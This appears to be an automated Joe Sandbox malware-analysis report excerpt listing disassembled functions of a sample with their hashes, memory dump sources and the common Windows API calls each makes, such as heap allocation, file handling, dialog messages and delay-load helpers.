Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 524586bb044b8a8ba5df5240b59e18e34f4a97c65f5085f6c4e3b758ac6c5287
Instruction ID: df401203f53735423693b10a787f0a7113efbd1786e09e26009d7380a9277ea0
Opcode Fuzzy Hash: 524586bb044b8a8ba5df5240b59e18e34f4a97c65f5085f6c4e3b758ac6c5287
Instruction Fuzzy Hash: D601AD30A10684DEC736F7A8C0053EDF7A4AF19300F40909DA89E17283CBB81B08D7A2

Function 00398518 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0039C13D,00000000,?,003967E2,?,00000008,?,003989AD,?,?,?), ref: 0039854A

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 35365e95a2eb404e42f36e6d6eb8136545a24d97526f7ceb498c154225a6969e
Instruction ID: 3a44d1ac6595d0e93c7d7d12b37dd5b5ae2207c33a8420f1a215b2ad646b2e74
Opcode Fuzzy Hash: 35365e95a2eb404e42f36e6d6eb8136545a24d97526f7ceb498c154225a6969e
Instruction Fuzzy Hash: 6CE065255461659BEF332B699C01B9A778C9BC37B0F174611AD54E6491CF20CC0545E5

Function 0037A4C6 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0037A4F5

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: dc1f992f99ec8e8d2879e97ab34082e6caee9ca6f108a9a1315272cc3f5fd898
Instruction ID: 5118194156ddb35c7d878d8af8092d315dc51d5b3e7a548f2c9de602bf0de6dc
Opcode Fuzzy Hash: dc1f992f99ec8e8d2879e97ab34082e6caee9ca6f108a9a1315272cc3f5fd898
Instruction Fuzzy Hash: 30F0E931009B80AACA335B7848047CEBBA46F46331F04CA4DF1FD16192C3BD14859723

Function 0038067C Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 003806B1

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: b333e1545f33d5fef620bccc009754adcf0ccae0fe8b9e3206f6933e71db0091
Instruction ID: bb4c7f6e86f97863a469f4e9dc14e3ebe05e2d6cfd5a1de8624bcec8a00e54c1
Opcode Fuzzy Hash: b333e1545f33d5fef620bccc009754adcf0ccae0fe8b9e3206f6933e71db0091
Instruction Fuzzy Hash: E6D02B2870031026C63B3364A8067FF1A0E4FC3710F0910A1B10D1B9878B8A08CB67F2

Function 00389D7B Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 00389D81

Part of subcall function 00389B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00389B30

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
Instruction ID: 8266ffe79207e811bc30cc4314fbbb780af41c3b1c1e76f2f829d340c18f961f
Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
Instruction Fuzzy Hash: 5ED0C73065830DBADF43BA759C02B7A7BEDDB00350F1445B7BC088A151ED71DE24A765

Function 00379989 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,00379887), ref: 00379995

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: c8c9de3b411a1066ff39fd48f3e7fcafaaa137ddcba89839c78456767c47d03b
Instruction ID: 06f6a0dfbb37439d7f67478e5929191ca2b55bc3550141ba3821875379d91b05
Opcode Fuzzy Hash: c8c9de3b411a1066ff39fd48f3e7fcafaaa137ddcba89839c78456767c47d03b
Instruction Fuzzy Hash: 8AD01231011140959F3386344D49299B755DB83376B3AC7A9E129C40A1D727C803F542

Function 0038D41A Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0038D43F

Part of subcall function 0038AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0038AC85
Part of subcall function 0038AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0038AC96
Part of subcall function 0038AC74: IsDialogMessageW.USER32(00010432,?), ref: 0038ACAA
Part of subcall function 0038AC74: TranslateMessage.USER32(?), ref: 0038ACB8
Part of subcall function 0038AC74: DispatchMessageW.USER32(?), ref: 0038ACC2

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: ca318308a8af705722ea03bfabb25ef4a12a963ea0ac4c1e884bf9b714439b7c
Instruction ID: 7f2696586d9a0b72ac3c7dafd430afc31cbfb322caa64300d65a4f8b30b1f333
Opcode Fuzzy Hash: ca318308a8af705722ea03bfabb25ef4a12a963ea0ac4c1e884bf9b714439b7c
Instruction Fuzzy Hash: 2AD09E71144300ABD6132B51DE07F0F7AAABB98B09F004655B348740B18A629D20DB16

Function 0038D8B6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b8cd044b5e59f1792f5b88dd37c30df188ea5c2aee6b5bd73a6419666a8854e4
Instruction ID: e635df854065b26f1b0ad856d743c2caa704da8e98cd2ebb200eaebfe627ff94
Opcode Fuzzy Hash: b8cd044b5e59f1792f5b88dd37c30df188ea5c2aee6b5bd73a6419666a8854e4
Instruction Fuzzy Hash: 86B0129626C2017C310B75147C06D37032CC4C3B10330C09BF50AD43C1D4405C091631

Function 0038D8AC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9e60a39e2784d79a1a9f21baf47298eff1a08f9ac8d5cb1e6b5b0d4d34a8f2d1
Instruction ID: fae447a8c6353aac665d51d7820b2e6f4cc27e2eff5f4c2eebf63e492d4c4645
Opcode Fuzzy Hash: 9e60a39e2784d79a1a9f21baf47298eff1a08f9ac8d5cb1e6b5b0d4d34a8f2d1
Instruction Fuzzy Hash: FFB0129A26C3027C310B71147C46D3B031CD4C3B11330805BF10AD41C1D4405C041731

Function 0038D891 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0c63b322c7ce0ee99ddc865fcc71ea11c8e5b02c800166d049be14bb5c58e906
Instruction ID: 42bbbc842756530251c15342ca747eb2640f86fcb5075ca12518dbac2b82e103
Opcode Fuzzy Hash: 0c63b322c7ce0ee99ddc865fcc71ea11c8e5b02c800166d049be14bb5c58e906
Instruction Fuzzy Hash: 88B0129A26C3017C310B31107C56C3B031CC4C2B1133085ABF10AE40C1D4405C485531

Function 0038D8FC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4d7ddfded4a350ca491eb122a1ff44fa0e0e8c6ddc5d9936c1f0fe301369cc41
Instruction ID: ded986d50d5ac0e9b433c7b803e6dbcf8d47335f9b149a4890db9191d352ff75
Opcode Fuzzy Hash: 4d7ddfded4a350ca491eb122a1ff44fa0e0e8c6ddc5d9936c1f0fe301369cc41
Instruction Fuzzy Hash: 06B012A626C2027C310F7125BC06D37031CC4C2B10330805BF10ED41C1D4405C051631

Function 0038D8F2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 068b423d5e81a5a2a945776f9ab8cb20d429efe5103116c0c19b4698843087dd
Instruction ID: 5ff5bab8674d7d17c23fe79f937b69255b1b9c919993643d56ca294f364af7ba
Opcode Fuzzy Hash: 068b423d5e81a5a2a945776f9ab8cb20d429efe5103116c0c19b4698843087dd
Instruction Fuzzy Hash: 48B012A626C2017C310F71247D06D37031CC4C2B10330805BF10ED41C1D4405D061631

Function 0038D8E8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2b018fbb2d227dec9f09b02767941f206a75be05d5428be3553f5704498ff907
Instruction ID: 1340b95a076ddbfa161635b8b330c208517795cf2b5e4e5f764fe4234296253f
Opcode Fuzzy Hash: 2b018fbb2d227dec9f09b02767941f206a75be05d5428be3553f5704498ff907
Instruction Fuzzy Hash: 83B012A626C3017C314B71247C06D37031CC4C2B10330815BF10ED41C1D4405C451631

Function 0038D8DE Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f2137a1f4a995b07f526521980add8c69fee1f62d6ecec6138cdd14b691c0ef0
Instruction ID: b25f1dde29ecd99a26a5a4bfe9f49718538aee6935ab86c128b8264e30cbcb0b
Opcode Fuzzy Hash: f2137a1f4a995b07f526521980add8c69fee1f62d6ecec6138cdd14b691c0ef0
Instruction Fuzzy Hash: 54B012A626C2017C310B71247C06D37031CC4C3B10330C05BF50ED41C1D4405C051631

Function 0038D8CA Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2385ef7f0212fc8a4c06cb5810625051d046dbde9029bad4ac5f57b3e807f8d6
Instruction ID: 7ca5bd4a119fff42f8c6feb7f820378f5a50daffecce5ba7acd1788fde50184e
Opcode Fuzzy Hash: 2385ef7f0212fc8a4c06cb5810625051d046dbde9029bad4ac5f57b3e807f8d6
Instruction Fuzzy Hash: E9B0129626C2017C310F75147D06D37032CC4C2B10330C09BF10AD43C1D4405C0E1631

Function 0038D8C0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 317e24fd1d4399e834b6dc6287ea928a68bec4386b408609f48f4fe10895560d
Instruction ID: 422f1463d1efc898426248f8db32da24a4b531fa0ae17f21a8670bae334f7067
Opcode Fuzzy Hash: 317e24fd1d4399e834b6dc6287ea928a68bec4386b408609f48f4fe10895560d
Instruction Fuzzy Hash: B3B0129626C3417C314B71147C06D37032CC4C2B10330C19BF10AD43C1D4405C891631

Function 0038D92E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3b3f0bc4906e41505ba3e470df021043b9369c12919a194b57cc00b79d4c4fa3
Instruction ID: d0e689efa0c5ca4057c810bfda92a1fc1c5f24bff41cf544c2c7b74f2f2a071d
Opcode Fuzzy Hash: 3b3f0bc4906e41505ba3e470df021043b9369c12919a194b57cc00b79d4c4fa3
Instruction Fuzzy Hash: CBB0129626C2017C310B71247C07D37035CC8C3B10330C05BF60AD41C1D5405C041631

Function 0038D924 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

